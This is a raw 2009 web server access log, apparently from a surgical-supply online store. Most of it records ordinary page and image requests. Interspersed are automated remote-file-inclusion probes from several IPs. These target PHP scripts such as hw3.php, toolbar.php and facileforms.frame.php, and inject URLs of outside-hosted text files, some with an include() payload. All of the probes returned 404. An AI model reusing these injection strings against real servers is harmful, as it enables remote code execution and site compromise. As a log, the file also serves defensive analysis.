124.0.237.140 - - [02/Aug/2009:02:31:51 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.114.35.0 - - [02/Aug/2009:02:32:12 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76277 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:14 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:14 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:14 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:14 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:15 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:15 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:15 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:16 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:16 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:16 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:16 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:17 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:17 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:17 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:17 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:18 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:18 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:18 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:19 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:19 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:20 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:20 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:20 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:20 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:20 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:20 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:21 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:21 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:21 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
124.0.237.140 - - [02/Aug/2009:02:32:35 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:32:35 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:32:35 -0400] "GET /logs/error_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
61.114.35.0 - - [02/Aug/2009:02:32:37 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2171E34D23650500AF23042+M37+ENG HTTP/1.1" 200 55917 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:38 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2171E34D23650500AF23042+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:39 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2171E34D23650500AF23042+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
124.0.237.140 - - [02/Aug/2009:02:32:44 -0400] "GET /logs/access_log.Q109070200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:32:48 -0400] "GET /logs/access_log.Q109072300//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.114.35.0 - - [02/Aug/2009:02:32:53 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2171E34D23650500AF23042+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:54 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:54 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:57 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:57 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:32:58 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76277 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:00 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:00 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:00 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:02 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:02 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:02 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:02 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:03 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:03 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
124.0.237.140 - - [02/Aug/2009:02:33:03 -0400] "GET /logs/access_log.Q109070200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.114.35.0 - - [02/Aug/2009:02:33:03 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:03 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:04 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:04 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
211.238.14.146 - - [02/Aug/2009:02:33:04 -0400] "GET /logs/access_log.Q109061700//banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
61.114.35.0 - - [02/Aug/2009:02:33:04 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:04 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
211.238.14.146 - - [02/Aug/2009:02:33:04 -0400] "GET /logs/access_log.Q109061700//banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
61.114.35.0 - - [02/Aug/2009:02:33:05 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:05 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:05 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:06 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:06 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:06 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:06 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:07 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:07 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:07 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:07 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
124.0.237.140 - - [02/Aug/2009:02:33:21 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:33:21 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:33:22 -0400] "GET /logs/error_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.14.123.202 - - [02/Aug/2009:02:33:23 -0400] "GET /logs/access_log.Q109061200/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.813"
216.14.123.202 - - [02/Aug/2009:02:33:23 -0400] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.813"
216.14.123.202 - - [02/Aug/2009:02:33:23 -0400] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.813"
216.14.123.202 - - [02/Aug/2009:02:33:23 -0400] "GET /logs/access_log.Q109060800/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.813"
61.114.35.0 - - [02/Aug/2009:02:33:28 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:32 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0191E3492E35A700DE0306L+M37+ENG HTTP/1.1" 200 45747 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
